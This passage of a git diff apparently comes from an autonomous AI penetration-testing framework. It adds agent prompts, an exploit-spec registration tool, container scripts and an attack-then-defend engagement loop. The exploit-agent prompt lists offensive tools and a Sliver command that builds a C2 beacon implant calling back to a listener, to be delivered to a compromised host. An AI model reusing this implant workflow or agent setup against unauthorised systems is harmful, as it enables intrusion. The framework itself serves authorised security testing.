return ( -
+
+ {/* Status bar */} +
+
+ {statusLabel[connState]} + + {engagementSlug} +
+ {/* Terminal container */} +
+
); } diff --git a/clients/web/src/lib/engagement-context.tsx b/clients/web/src/lib/engagement-context.tsx new file mode 100644 index 00000000..3cf1eef9 --- /dev/null +++ b/clients/web/src/lib/engagement-context.tsx @@ -0,0 +1,66 @@ +"use client"; + +import { createContext, useContext, useState, useCallback, type ReactNode } from "react"; +import type { SubagentCustomEvent } from "@decepticon/streaming"; + +interface EngagementContextValue { + engagementId: string; + engagementSlug: string; + agentId: "soundwave" | "decepticon"; + threadId: string | null; + setThreadId: (id: string) => void; + events: SubagentCustomEvent[]; + isRunning: boolean; + activeRunId: string | null; +} + +const EngagementContext = createContext(null); + +export function useEngagementContext(): EngagementContextValue { + const ctx = useContext(EngagementContext); + if (!ctx) throw new Error("useEngagementContext must be used within EngagementProvider"); + return ctx; +} + +interface EngagementProviderProps { + children: ReactNode; + engagementId: string; + engagementSlug: string; + agentId: "soundwave" | "decepticon"; + events: SubagentCustomEvent[]; + isRunning: boolean; + activeRunId: string | null; +} + +export function EngagementProvider({ + children, + engagementId, + engagementSlug, + agentId, + events, + isRunning, + activeRunId, +}: EngagementProviderProps) { + const [threadId, setThreadId] = useState(null); + + const handleSetThreadId = useCallback((id: string) => { + setThreadId(id); + }, []); + + return ( + + {children} + + ); +} diff --git a/containers/web-entrypoint.sh b/containers/web-entrypoint.sh index c75f87aa..612f04e8 100644 --- a/containers/web-entrypoint.sh +++ b/containers/web-entrypoint.sh @@ -1,13 +1,80 @@ #!/bin/sh -set -e +# Entrypoint for decepticon-web container. +# +# Process model: +# PID 1 — this script (trap handler, keeps container alive) +# child — terminal server (ws://0.0.0.0:3003) — long-lived, survives Next.js restarts +# child — Next.js standalone server (:3000) — restartable via SIGUSR1 +# +# SIGUSR1 handler: kills and restarts only the Next.js process. The terminal +# server (and any PTY sessions it manages) stays alive. This is what +# scripts/web-hotswap.sh sends after injecting new .next/ files — zero +# WebSocket disconnection for the operator. +# +# SIGTERM handler: clean shutdown of both processes (docker stop). +set -e cd /app/clients/web -echo "[decepticon-web] Running DB migrations..." -npx prisma migrate deploy +NEXT_PID="" +TERM_PID="" + +# ── Handlers ────────────────────────────────────────────────────── + +restart_next() { + echo "[entrypoint] SIGUSR1 received — restarting Next.js..." + if [ -n "$NEXT_PID" ] && kill -0 "$NEXT_PID" 2>/dev/null; then + kill "$NEXT_PID" 2>/dev/null + wait "$NEXT_PID" 2>/dev/null || true + fi + echo "[entrypoint] Starting Next.js..." + node server.js & + NEXT_PID=$! + echo "[entrypoint] Next.js restarted (PID $NEXT_PID)" +} + +shutdown() { + echo "[entrypoint] SIGTERM received — shutting down..." + [ -n "$NEXT_PID" ] && kill "$NEXT_PID" 2>/dev/null + [ -n "$TERM_PID" ] && kill "$TERM_PID" 2>/dev/null + wait 2>/dev/null + exit 0 +} + +trap restart_next USR1 +trap shutdown TERM INT + +# ── Startup ─────────────────────────────────────────────────────── + +echo "[entrypoint] Running DB migrations..." +npx --yes prisma migrate deploy 2>&1 | grep -v 'npm notice' + +echo "[entrypoint] Starting terminal server (ws://0.0.0.0:${TERMINAL_PORT:-3003})..." +npx --yes tsx server/terminal-server.ts & +TERM_PID=$! + +echo "[entrypoint] Starting Next.js (standalone)..." +node server.js & +NEXT_PID=$! -echo "[decepticon-web] Starting terminal server (ws://0.0.0.0:${TERMINAL_PORT:-3003})..." -npx tsx server/terminal-server.ts & +echo "[entrypoint] Ready (terminal=$TERM_PID, next=$NEXT_PID)" -echo "[decepticon-web] Starting Next.js (standalone)..." -exec node server.js +# Wait for either child to exit. If Next.js crashes, restart it. +# If the terminal server crashes, exit (Docker will restart the container). +while true; do + # `wait -n` waits for any one child. Not available in dash/busybox sh, + # so we poll instead. + if ! kill -0 "$TERM_PID" 2>/dev/null; then + echo "[entrypoint] Terminal server died — exiting" + [ -n "$NEXT_PID" ] && kill "$NEXT_PID" 2>/dev/null + exit 1 + fi + if ! kill -0 "$NEXT_PID" 2>/dev/null; then + echo "[entrypoint] Next.js died — restarting..." + sleep 1 + node server.js & + NEXT_PID=$! + echo "[entrypoint] Next.js restarted (PID $NEXT_PID)" + fi + sleep 2 +done diff --git a/containers/web.Dockerfile b/containers/web.Dockerfile index 12bc9788..8f8e1955 100644 --- a/containers/web.Dockerfile +++ b/containers/web.Dockerfile @@ -16,6 +16,7 @@ RUN apt-get update && apt-get install -y --no-install-recommends \ # ---------------------- # deps — install full workspace dependencies (incl. devDependencies for build). +# Layer busted only when package.json or package-lock.json change. # ---------------------- FROM build-base AS deps @@ -30,7 +31,12 @@ RUN npm ci --no-audit --no-fund # ---------------------- # build — prisma generate + next build. -# Granular COPYs so unrelated files don't bust the build cache. +# +# Layer strategy (ordered by change frequency, rarest first): +# 1. node_modules (busted only by package.json changes — deps stage) +# 2. shared libs (changes rarely) +# 3. cli source (changes occasionally) +# 4. web source (changes most often — last COPY before build) # ---------------------- FROM build-base AS build @@ -38,14 +44,15 @@ WORKDIR /app COPY --from=deps /app/node_modules ./node_modules COPY package.json package-lock.json ./ -COPY clients/web ./clients/web -COPY clients/cli ./clients/cli + +# Rarely-changing layers first COPY clients/shared ./clients/shared +COPY clients/cli ./clients/cli -# Stamp the package version from the git tag at build time. Source-tree -# package.json files carry a "0.0.0" sentinel; release.yml passes the real -# version via --build-arg. Both web (this image's surface) and cli (spawned -# by the terminal server via PTY) need the patched value. +# Web source last — most frequent changes only bust from here +COPY clients/web ./clients/web + +# Stamp the package version from the git tag at build time. ARG VERSION=0.0.0 RUN sed -i 's/"version": "[^"]*"/"version": "'"$VERSION"'"/' clients/web/package.json && \ sed -i 's/"version": "[^"]*"/"version": "'"$VERSION"'"/' clients/cli/package.json @@ -80,23 +87,28 @@ ENV TERMINAL_PORT=3003 RUN addgroup --system --gid 1001 nodejs && \ adduser --system --uid 1001 nextjs -# Standalone Next.js server -COPY --from=build --chown=nextjs:nodejs /app/clients/web/.next/standalone ./ -COPY --from=build --chown=nextjs:nodejs /app/clients/web/.next/static ./clients/web/.next/static -COPY --from=build --chown=nextjs:nodejs /app/clients/web/public ./clients/web/public -# Prisma schema + migrations +# Heaviest layer first — cached unless deps change +COPY --from=build --chown=nextjs:nodejs /app/node_modules ./node_modules + +# Prisma schema + migrations (rarely changes) COPY --from=build --chown=nextjs:nodejs /app/clients/web/prisma ./clients/web/prisma COPY --from=build --chown=nextjs:nodejs /app/clients/web/prisma.config.ts ./clients/web/prisma.config.ts -# Terminal WebSocket server -COPY --from=build --chown=nextjs:nodejs /app/clients/web/server ./clients/web/server + +# Shared streaming library +COPY --from=build --chown=nextjs:nodejs /app/clients/shared ./clients/shared + # CLI source (spawned by terminal server via PTY) COPY --from=build --chown=nextjs:nodejs /app/clients/cli/src ./clients/cli/src COPY --from=build --chown=nextjs:nodejs /app/clients/cli/package.json ./clients/cli/package.json -# Shared streaming library -COPY --from=build --chown=nextjs:nodejs /app/clients/shared ./clients/shared -# Production workspace dependencies: external Next packages, Prisma CLI, -# node-pty, sharp, and tsx for the current embedded terminal/CLI bridge. -COPY --from=build --chown=nextjs:nodejs /app/node_modules ./node_modules +# Public assets (changes rarely) +COPY --from=build --chown=nextjs:nodejs /app/clients/web/public ./clients/web/public + +# Terminal WebSocket server (changes occasionally) +COPY --from=build --chown=nextjs:nodejs /app/clients/web/server ./clients/web/server + +# Standalone Next.js server + static — changes every build but layer is small (~80MB) +COPY --from=build --chown=nextjs:nodejs /app/clients/web/.next/standalone ./ +COPY --from=build --chown=nextjs:nodejs /app/clients/web/.next/static ./clients/web/.next/static WORKDIR /app/clients/web diff --git a/decepticon/agents/decepticon.py b/decepticon/agents/decepticon.py index 96e13a56..3a5ac781 100644 --- a/decepticon/agents/decepticon.py +++ b/decepticon/agents/decepticon.py @@ -88,7 +88,8 @@ def create_decepticon_agent(): # langgraph process never reads from the host filesystem. backend = sandbox - # Build sub-agents from existing agent factories + # Build sub-agents from existing agent factories (lazy-load to avoid + # importing all 8 agent modules on every startup). # noqa: PLC0415 from decepticon.agents.ad_operator import create_ad_operator_agent from decepticon.agents.analyst import create_analyst_agent from decepticon.agents.cloud_hunter import create_cloud_hunter_agent diff --git a/decepticon/agents/exploit.py b/decepticon/agents/exploit.py index fe77acbc..a76999f9 100644 --- a/decepticon/agents/exploit.py +++ b/decepticon/agents/exploit.py @@ -38,6 +38,7 @@ methodology_lookup, payload_search, ) +from decepticon.tools.research.exploit_spec_writer import exploit_spec_register from decepticon.tools.research.tools import ( cve_lookup, kg_add_edge, @@ -102,6 +103,8 @@ def create_exploit_agent(): cve_poc_lookup, payload_search, methodology_lookup, + # Vaccine: register machine-readable exploit spec for env-grounded re-attack + exploit_spec_register, # Execution *BASH_TOOLS, ] diff --git a/decepticon/agents/prompts/exploit.md b/decepticon/agents/prompts/exploit.md index 991fb0c7..4ce810f9 100644 --- a/decepticon/agents/prompts/exploit.md +++ b/decepticon/agents/prompts/exploit.md @@ -9,7 +9,7 @@ You are an operator and analyst — not just an exploit runner. Evaluate attack These rules override all other instructions: -1. **Workspace Root**: Use the `Workspace:` path provided in the task or engagement context as the engagement workspace. Use relative paths under it (`plan/`, `exploit/`, `findings/`). Artifact directories are created lazily: do not create empty scaffold directories or placeholder files; create a parent directory only immediately before writing a required artifact. +1. **Workspace Root**: Use the `Workspace:` path provided in the task or engagement context as the engagement workspace. Use relative paths under it (`plan/`, `exploit/`, `findings/`). Artifact directories are created lazily: do not create empty scaffold directories or placeholder files; create a parent directory only immediately before writing a required artifact. 2. **Sandbox Only**: ALL commands execute via `bash()` inside the Docker sandbox. Never attempt host command execution. 3. **RoE Compliance**: Only exploit vulnerabilities explicitly within the Rules of Engagement scope. Verify before every attempt. 4. **Scope Compliance**: Do NOT target systems, services, or accounts outside the authorized boundary. @@ -17,7 +17,7 @@ These rules override all other instructions: 6. **is_input=False by Default**: ALWAYS start commands with `is_input=False`. Only use `is_input=True` when a PREVIOUS command is actively waiting for input. 7. **Evidence Trail**: Document every exploitation attempt — success or failure — with timestamps and technique IDs. 8. **Output Discipline**: Maximum **3 output files** per objective: `exploit/shells.json`, `exploit/creds_initial.json`, and optionally one exploit notes file. Do NOT create README, INDEX, SUMMARY, QUICK_REFERENCE, ASSESSMENT_SUMMARY, or any other organizational documents — they waste context and provide no operational value. -9. **Findings Recording**: For each verified exploited vulnerability, create a separate `findings/FIND-{NNN}.md` following the FINDING_PROTOCOL template. Include exploitation evidence (commands, output, access level achieved). Save raw evidence to `findings/evidence/` only when it supports that finding. Append to `timeline.jsonl` only for real activity or finding events; never initialize empty placeholder artifacts. +9. **Findings Recording**: For each verified exploited vulnerability, create a separate `findings/FIND-{NNN}.md` following the FINDING_PROTOCOL template. Include exploitation evidence (commands, output, access level achieved). Save raw evidence to `findings/evidence/` only when it supports that finding. Append to `timeline.jsonl` only for real activity or finding events; never initialize empty placeholder artifacts. 10. **Markdown Only**: ALL deliverable documents MUST be Markdown format. Never write JSON as a report or finding document. (`shells.json` and `creds_initial.json` are operational data files, not deliverable documents.) @@ -25,7 +25,7 @@ These rules override all other instructions: ## Sandbox (Docker Container) — Primary Operational Environment - Execute via: `bash(command="...")` - Tools: `sqlmap`, `ysoserial`, `Certipy`, `Rubeus`, `Impacket`, `responder`, `CrackMapExec`, `NetExec`, `BloodHound`, standard Linux utilities -- Canonical artifact paths under the engagement workspace (some may not exist until first use): +- Canonical artifact paths under the engagement workspace (some may not exist until first use): - `plan/roe.json`, `plan/opplan.json` — engagement documents - `recon/` — reconnaissance data (read) - `exploit/` — exploitation output (write) @@ -73,7 +73,7 @@ When exploitation phase is complete: ``` bash(command="sliver-client import /workspace/.sliver-configs/decepticon.cfg") bash(command="sliver-client console", session="c2") - bash(command="generate beacon --mtls c2-sliver:8888 --os --arch amd64 --seconds 30 --jitter 50 --save exploit/implants/", is_input=True, session="c2") + bash(command="generate beacon --mtls c2-sliver:8888 --os --arch amd64 --seconds 30 --jitter 50 --save exploit/implants/", is_input=True, session="c2") ``` Deliver the generated implant to the compromised host and confirm callback. 4. Update OPPLAN status @@ -128,3 +128,12 @@ REMINDER — These rules are absolute and override everything above: - If uncertain whether a target is in scope, STOP and confirm with the orchestrator - Document every exploitation attempt — success or failure — with timestamps and technique IDs + + +## Vaccine Loop: Register Exploit Specs + +After writing FIND-NNN.md for a successful exploit, call `exploit_spec_register` with a self-contained `poc_command`, at least one `success_pattern` (regex matched against PoC stdout/stderr), and `target_checks` for any environment state the exploit depends on (PortCheck/ServiceCheck/CommandOutputCheck/CredentialCheck/FileCheck). Provide a `negative_command` (ZFP baseline) when feasible. The EnvironmentVerifier replays this spec after defenses are applied to produce a grounded RLVR reward — no LLM judges the outcome. + +- `impact_patterns`: regexes confirming ACTUAL IMPACT (e.g., `uid=0`, `root@`, data exfiltration patterns). Triager-grade evidence requires at least one impact pattern. +- `runs`: set to 3 for reliable findings, 1 for quick checks. Recommended: 3. +- `min_success_rate`: 0.67 for 2/3 consensus, 1.0 (default) for strict. Use 0.67 for noisy environments. diff --git a/decepticon/agents/prompts/recon.md b/decepticon/agents/prompts/recon.md index 96a9ad49..92578d4f 100644 --- a/decepticon/agents/prompts/recon.md +++ b/decepticon/agents/prompts/recon.md @@ -9,13 +9,13 @@ You are an analyst and collaborator — not just a scanner. Interpret results cr These rules override all other instructions: -1. **Workspace Root**: Use the `Workspace:` path provided in the task or engagement context as the engagement workspace. Use relative paths under it (`plan/`, `recon/`, `findings/`). Artifact directories are created lazily: do not create empty scaffold directories or placeholder files; create a parent directory only immediately before writing a required artifact. The bash tmux session starts in that workspace and **persists working directory across calls**: once you `cd recon`, every subsequent `bash()` call in that session is already there. Do NOT prefix every command with repeated absolute workspace paths — it wastes tokens and signals confusion. Run `pwd` once if you are unsure, then trust the session state. +1. **Workspace Root**: Use the `Workspace:` path provided in the task or engagement context as the engagement workspace. Use relative paths under it (`plan/`, `recon/`, `findings/`). Artifact directories are created lazily: do not create empty scaffold directories or placeholder files; create a parent directory only immediately before writing a required artifact. The bash tmux session starts in that workspace and **persists working directory across calls**: once you `cd recon`, every subsequent `bash()` call in that session is already there. Do NOT prefix every command with repeated absolute workspace paths — it wastes tokens and signals confusion. Run `pwd` once if you are unsure, then trust the session state. 2. **Sandbox Only**: ALL commands execute via `bash()` inside the Docker sandbox. Never attempt host command execution. 3. **OPSEC First**: Never perform destructive actions. Minimize scan noise. Respect scope boundaries. 4. **Scope Compliance**: Do NOT scan targets outside the engagement boundary under any circumstances. 5. **is_input=False by Default**: ALWAYS start commands with `is_input=False`. Only use `is_input=True` when a PREVIOUS command is actively waiting for input. 6. **Output Discipline**: Maximum **2 output files** per objective: the recon report (`recon/report_.md`) and optionally one raw scan data file. Do NOT create README, INDEX, SUMMARY, QUICK_REFERENCE, ASSESSMENT, or any other organizational documents — they waste context and provide no operational value. -7. **Findings Recording**: For each verified discovered vulnerability, create a separate `findings/FIND-{NNN}.md` following the FINDING_PROTOCOL template. Save raw evidence to `findings/evidence/` only when it supports that finding. Append to `timeline.jsonl` only for real activity or finding events; never initialize empty placeholder artifacts. +7. **Findings Recording**: For each verified discovered vulnerability, create a separate `findings/FIND-{NNN}.md` following the FINDING_PROTOCOL template. Save raw evidence to `findings/evidence/` only when it supports that finding. Append to `timeline.jsonl` only for real activity or finding events; never initialize empty placeholder artifacts. 8. **Markdown Only**: ALL deliverable documents MUST be Markdown format. Never write JSON as a report or finding document. @@ -23,7 +23,7 @@ These rules override all other instructions: ## Sandbox (Docker Container) — Primary Operational Environment - Execute via: `bash(command="...")` - Tools: `nmap`, `dig`, `whois`, `subfinder`, `curl`, `wget`, `netcat`, standard Linux utilities -- Canonical artifact paths under the engagement workspace (some may not exist until first use): +- Canonical artifact paths under the engagement workspace (some may not exist until first use): - `recon/` — scan results and recon artifacts - `plan/` — engagement documents (roe.json, opplan.json) - `findings/` — individual finding reports (FIND-001.md, FIND-002.md, ...) @@ -115,3 +115,12 @@ REMINDER — These rules are absolute and override everything above: - If uncertain whether a target is in scope, STOP and ask the orchestrator - Save ALL outputs to the engagement workspace directory + + +## Vaccine Loop: Register Exploit Specs + +After writing FIND-NNN.md for a successful exploit, call `exploit_spec_register` with a self-contained `poc_command`, at least one `success_pattern` (regex matched against PoC stdout/stderr), and `target_checks` for any environment state the exploit depends on (PortCheck/ServiceCheck/CommandOutputCheck/CredentialCheck/FileCheck). Provide a `negative_command` (ZFP baseline) when feasible. The EnvironmentVerifier replays this spec after defenses are applied to produce a grounded RLVR reward — no LLM judges the outcome. + +- `impact_patterns`: regexes confirming ACTUAL IMPACT (e.g., `uid=0`, `root@`, data exfiltration patterns). Triager-grade evidence requires at least one impact pattern. +- `runs`: set to 3 for reliable findings, 1 for quick checks. Recommended: 3. +- `min_success_rate`: 0.67 for 2/3 consensus, 1.0 (default) for strict. Use 0.67 for noisy environments. diff --git a/decepticon/agents/prompts/scanner.md b/decepticon/agents/prompts/scanner.md index 063b84b8..285f1334 100644 --- a/decepticon/agents/prompts/scanner.md +++ b/decepticon/agents/prompts/scanner.md @@ -73,3 +73,12 @@ that explicitly via the `extensions` parameter (`"sol"`). - Do NOT speculate about exploitability in candidate reasons. State the facts: sink kind, nearby source, file path. Leave judgment to the Detector. + + +## Vaccine Loop: Register Exploit Specs + +After writing FIND-NNN.md for a successful exploit, call `exploit_spec_register` with a self-contained `poc_command`, at least one `success_pattern` (regex matched against PoC stdout/stderr), and `target_checks` for any environment state the exploit depends on (PortCheck/ServiceCheck/CommandOutputCheck/CredentialCheck/FileCheck). Provide a `negative_command` (ZFP baseline) when feasible. The EnvironmentVerifier replays this spec after defenses are applied to produce a grounded RLVR reward — no LLM judges the outcome. + +- `impact_patterns`: regexes confirming ACTUAL IMPACT (e.g., `uid=0`, `root@`, data exfiltration patterns). Triager-grade evidence requires at least one impact pattern. +- `runs`: set to 3 for reliable findings, 1 for quick checks. Recommended: 3. +- `min_success_rate`: 0.67 for 2/3 consensus, 1.0 (default) for strict. Use 0.67 for noisy environments. diff --git a/decepticon/agents/recon.py b/decepticon/agents/recon.py index 39202cc0..9e8813ff 100644 --- a/decepticon/agents/recon.py +++ b/decepticon/agents/recon.py @@ -34,6 +34,7 @@ from decepticon.tools.bash import BASH_TOOLS from decepticon.tools.bash.bash import set_sandbox from decepticon.tools.references.tools import killchain_lookup, oneliner_search +from decepticon.tools.research.exploit_spec_writer import exploit_spec_register from decepticon.tools.research.tools import ( kg_add_edge, kg_add_node, @@ -115,6 +116,8 @@ def create_recon_agent(): # References oneliner_search, killchain_lookup, + # Vaccine: register machine-readable exploit spec for env-grounded re-attack + exploit_spec_register, # Execution *BASH_TOOLS, ] diff --git a/decepticon/agents/scanner.py b/decepticon/agents/scanner.py index 59041c29..1b4b6eba 100644 --- a/decepticon/agents/scanner.py +++ b/decepticon/agents/scanner.py @@ -33,6 +33,7 @@ from decepticon.middleware.skills import SkillsMiddleware from decepticon.tools.bash import BASH_TOOLS from decepticon.tools.bash.bash import set_sandbox +from decepticon.tools.research.exploit_spec_writer import exploit_spec_register from decepticon.tools.research.scanner_tools import SCANNER_TOOLS from decepticon.tools.research.tools import kg_query, kg_stats @@ -86,7 +87,7 @@ def create_scanner_agent(): # Tight tool surface: sharded scanner helpers + minimal KG read access + # bash for directory sizing only. NO vuln analysis tools. - tools = [*SCANNER_TOOLS, kg_query, kg_stats, *BASH_TOOLS] + tools = [*SCANNER_TOOLS, kg_query, kg_stats, exploit_spec_register, *BASH_TOOLS] agent = create_agent( llm, diff --git a/decepticon/backends/docker_sandbox.py b/decepticon/backends/docker_sandbox.py index 936bd57a..a6e3172e 100644 --- a/decepticon/backends/docker_sandbox.py +++ b/decepticon/backends/docker_sandbox.py @@ -51,7 +51,7 @@ def _docker_cfg(): PS1_PATTERN = re.compile(r"\[DCPTN:(\d+):(.+?)\]") POLL_INTERVAL: float = 0.5 -STALL_SECONDS: float = 3.0 +STALL_SECONDS: float = 5.0 MAX_OUTPUT_CHARS: int = 30_000 AUTO_BACKGROUND_SECONDS: float = 60.0 SIZE_WATCHDOG_CHARS: int = 5_000_000 diff --git a/decepticon/core/config.py b/decepticon/core/config.py index 85be09b7..11db75a5 100644 --- a/decepticon/core/config.py +++ b/decepticon/core/config.py @@ -50,7 +50,7 @@ class DockerConfig(BaseModel): # ── tmux session behavior ── poll_interval: float = Field(0.5, gt=0.0, description="Seconds between capture-pane polls") stall_seconds: float = Field( - 3.0, gt=0.0, description="Seconds of no screen change → treat as interactive prompt" + 5.0, gt=0.0, description="Seconds of no screen change → treat as interactive prompt" ) max_output_chars: int = Field( 30_000, gt=0, description="Truncate command output larger than this" diff --git a/decepticon/core/engagement_loop.py b/decepticon/core/engagement_loop.py new file mode 100644 index 00000000..4d5ce243 --- /dev/null +++ b/decepticon/core/engagement_loop.py @@ -0,0 +1,846 @@ +"""System-level engagement loop — Decepticon's Ralph Mode. + +Follows the Deep Agents ralph_mode.py pattern: a Python async while loop +that invokes LangGraph agents with fresh context per iteration. The +filesystem (workspace/) and Neo4j KG serve as memory across iterations. + +Two autonomous phases (planning is handled by the decepticon main agent): + Phase 2 (attack): Ralph loop iterates OPPLAN objectives with fresh agent per iteration + Phase 3 (vaccine): Batch defense/verification for all accumulated findings + +Prerequisites: + - workspace/plan/opplan.json must exist (generated by decepticon agent via Soundwave) + - workspace/plan/roe.json should exist (scope constraints) + +Usage: + loop = EngagementLoop(workspace, config) + state = await loop.run() # starts at ATTACK phase +""" + +from __future__ import annotations + +import json +import os +import re +import time +import uuid +from datetime import datetime, timezone +from pathlib import Path + +import httpx + +from decepticon.core.engagement import ( + EngagementConfig, + EngagementPhase, + EngagementState, + IterationResult, + VaccineMode, +) +from decepticon.core.env_verifier import EnvironmentVerifier +from decepticon.core.logging import get_logger +from decepticon.core.schemas import OPPLAN, Objective, ObjectiveStatus +from decepticon.schemas.defense_brief import ( + DefenseActionType, + DefenseBrief, + DefenseRecommendation, + ReAttackOutcome, + VerificationResult, +) +from decepticon.schemas.env_verification import CheckPhase +from decepticon.tools.bash.bash import get_sandbox +from decepticon.tools.research.poc import sandbox_runner + +log = get_logger("core.engagement_loop") + + +class EngagementLoop: + """System-level engagement orchestrator following ralph_mode.py pattern.""" + + def __init__(self, workspace: Path, config: EngagementConfig) -> None: + self._workspace = workspace + self._config = config + self._state: EngagementState | None = None + self._opplan: OPPLAN | None = None + sandbox = get_sandbox() + self._verifier: EnvironmentVerifier | None = ( + EnvironmentVerifier(self._workspace, sandbox_runner(sandbox)) + if sandbox is not None + else None + ) + + async def run(self) -> EngagementState: + """Main loop — executes attack and vaccine phases. + + Prerequisites: OPPLAN must already exist at workspace/plan/opplan.json. + The decepticon main agent handles the planning phase (Soundwave interview) + before triggering this loop. + """ + # Load or create state + self._state = EngagementState.load(self._workspace) or EngagementState( + max_iterations=self._config.max_iterations, + workspace=str(self._workspace), + target=self._config.target, + phase=EngagementPhase.ATTACK, + ) + assert self._state is not None + if self._state.resumed_at is None and self._state.iteration > 0: + self._state.resumed_at = datetime.now(timezone.utc) + + # Verify OPPLAN exists (must be created by decepticon agent before loop starts) + self._opplan = self._load_opplan() + if self._opplan is None: + log.error( + "OPPLAN not found at %s/plan/opplan.json — " + "decepticon agent must generate it before starting the loop", + self._workspace, + ) + self._state.phase = EngagementPhase.COMPLETE + self._state.save(self._workspace) + return self._state + + log.info( + "Engagement loop started: phase=%s iteration=%d objectives=%d", + self._state.phase, + self._state.iteration, + len(self._opplan.objectives), + ) + # Recover stale in-progress objectives from a previous crash/restart. + # The loop marks objectives IN_PROGRESS before invoking the agent and + # updates to COMPLETED/BLOCKED after. If the process dies between those + # two writes, the objective is orphaned and never retried. + self._recover_stale_objectives() + + try: + while not self._state.is_complete: + match self._state.phase: + case EngagementPhase.ATTACK: + await self._run_attack_phase() + case EngagementPhase.VACCINE: + await self._run_vaccine_phase() + case EngagementPhase.COMPLETE: + break + case _: + # PLANNING phase is handled by decepticon agent, not this loop + self._state.phase = EngagementPhase.ATTACK + + self._state.save(self._workspace) + + except KeyboardInterrupt: + log.info("Interrupt received — saving state for resume") + if self._state: + self._state.save(self._workspace) + raise + + self._state.phase = EngagementPhase.COMPLETE + self._state.save(self._workspace) + log.info("Engagement complete: %s", self._state.summary) + return self._state + + # ── Phase runners ────────────────────────────────────────────────────────── + + async def _run_attack_phase(self) -> None: + """Ralph-pattern attack loop — one objective per iteration with a fresh agent.""" + assert self._state is not None + + # Reload opplan from disk each iteration (fresh context = ralph pattern) + self._opplan = self._load_opplan() + if self._opplan is None: + log.error("opplan.json missing during attack phase — returning to planning") + self._state.phase = EngagementPhase.PLANNING + return + + obj = self._next_pending_objective() + if obj is None: + log.info("All objectives processed — transitioning to vaccine phase") + self._state.phase = EngagementPhase.VACCINE + return + + self._state.current_objective_id = obj.id + self._state.iteration += 1 + + agent_name = self._select_agent(obj) + prompt = self._build_attack_prompt(obj) + + log.info( + "Attack iteration %d: objective=%s agent=%s", + self._state.iteration, + obj.id, + agent_name, + ) + + start_time = time.time() + # Mark in-progress before invoking + self._update_opplan_objective(obj.id, ObjectiveStatus.IN_PROGRESS) + + result: IterationResult + new_status: ObjectiveStatus + try: + response = await self._invoke_agent(agent_name, prompt) + result = self._parse_objective_result(response, obj, agent_name, start_time) + + self._state.iteration_history.append(result) + + if result.outcome == "PASSED": + new_status = ObjectiveStatus.COMPLETED + self._state.objectives_completed.append(obj.id) + else: + new_status = ObjectiveStatus.BLOCKED + self._state.objectives_blocked.append(obj.id) + except KeyboardInterrupt: + raise + except Exception as exc: + log.exception("Objective %s crashed mid-execution — marking BLOCKED", obj.id) + new_status = ObjectiveStatus.BLOCKED + self._state.objectives_blocked.append(obj.id) + result = IterationResult( + objective_id=obj.id, + agent_used=agent_name, + outcome="BLOCKED", + findings_produced=[], + duration_seconds=round(time.time() - start_time, 2), + raw_output=f"Exception: {exc}", + ) + self._state.iteration_history.append(result) + + self._update_opplan_objective(obj.id, new_status) + + # Track findings + for finding_ref in result.findings_produced: + if finding_ref not in self._state.findings_discovered: + self._state.findings_discovered.append(finding_ref) + + # Immediate vaccine mode: apply defense right after finding discovery + if self._config.vaccine_mode == VaccineMode.IMMEDIATE and result.findings_produced: + log.info( + "Immediate vaccine mode — applying defense for %d finding(s)", + len(result.findings_produced), + ) + await self._apply_defenses(result.findings_produced) + + async def _run_vaccine_phase(self) -> None: + """Batch defense/verification for all accumulated findings. + + Merges findings tracked in state with those discovered on disk + (workspace/findings/FIND-*.md) so that findings written by the attack + agents but not captured in state are also processed. + """ + assert self._state is not None + + # Scan filesystem for FIND-*.md files and merge with state-tracked refs + fs_findings = self._scan_findings() + tracked = set(self._state.findings_discovered) + for ref in fs_findings: + if ref not in tracked: + log.info("Vaccine phase: adding filesystem-discovered finding %s to state", ref) + self._state.findings_discovered.append(ref) + tracked.add(ref) + + # A finding is unprocessed if it has no verification result on disk + unprocessed = [ + f + for f in self._state.findings_discovered + if not (self._workspace / f"verification-{f}.json").exists() + ] + + if not unprocessed: + log.info("Vaccine phase: no unprocessed findings — transitioning to COMPLETE") + self._state.phase = EngagementPhase.COMPLETE + return + + log.info( + "Vaccine phase: processing %d finding(s): %s", len(unprocessed), ", ".join(unprocessed) + ) + await self._apply_defenses(unprocessed) + self._state.phase = EngagementPhase.COMPLETE + + # ── Helpers ──────────────────────────────────────────────────────────────── + + async def _apply_defenses(self, finding_refs: list[str]) -> None: + """Generate a defense brief and invoke the defender agent for each finding. + + For each finding: + 1. Parses the finding markdown to build a structured DefenseBrief + 2. Writes brief to workspace/defense-brief.json + 3. Invokes the defender agent with a prompt pointing at the brief + 4. Loads the verification result written by the agent and logs outcome + """ + for finding_ref in finding_refs: + brief_path = self._workspace / "defense-brief.json" + brief = self._generate_defense_brief(finding_ref) + if brief is None: + log.warning("Could not generate defense brief for %s — skipping", finding_ref) + continue + try: + brief_path.write_text(brief.model_dump_json(indent=2), encoding="utf-8") + log.info( + "Defense brief written for %s (%d recommended action(s))", + finding_ref, + len(brief.recommended_actions), + ) + except OSError as exc: + log.error("Could not write defense brief for %s: %s", finding_ref, exc) + continue + + defense_prompt = ( + f"## Defense Action Required\n\n" + f"Finding: {finding_ref}\n" + f"Brief: {brief_path}\n" + f"Workspace: {self._workspace}\n\n" + "Read the defense-brief.json, execute the recommended defense actions, " + "re-attack to verify, and write verification results to " + f"verification-{finding_ref}.json. " + "Signal DEFENSE COMPLETE or DEFENSE FAILED when done." + ) + + # Pre-defense environment snapshot for grounded verification + use_env = os.environ.get("VACCINE_USE_ENV_VERIFIER", "1") != "0" + if use_env and self._verifier is not None: + spec = self._verifier.load_spec(finding_ref) + if spec is not None: + pre = await self._verifier.capture_state(spec, phase=CheckPhase.PRE_DEFENSE) + self._verifier.persist_snapshot(pre) + + log.info("Invoking defender agent for %s", finding_ref) + await self._invoke_agent("defender", defense_prompt) + + # Env-grounded verification first; fall back to legacy LLM result + result = await self._verify_finding_env(finding_ref) + if result is not None: + if result.re_attack_outcome == ReAttackOutcome.BLOCKED: + log.info("Defense VERIFIED for %s — re-attack blocked", finding_ref) + else: + log.warning( + "Defense result for %s: outcome=%s", + finding_ref, + result.re_attack_outcome, + ) + else: + log.warning( + "No verification result for %s after defender ran — " + "defense agent may not have written verification-%s.json", + finding_ref, + finding_ref, + ) + + async def _verify_finding_env(self, finding_ref: str) -> VerificationResult | None: + """Try env-grounded verification first; fall back to legacy LLM result.""" + use_env = os.environ.get("VACCINE_USE_ENV_VERIFIER", "1") != "0" + if use_env and self._verifier is not None: + spec = self._verifier.load_spec(finding_ref) + if spec is not None: + post = await self._verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + pre = self._verifier.load_snapshot(finding_ref, 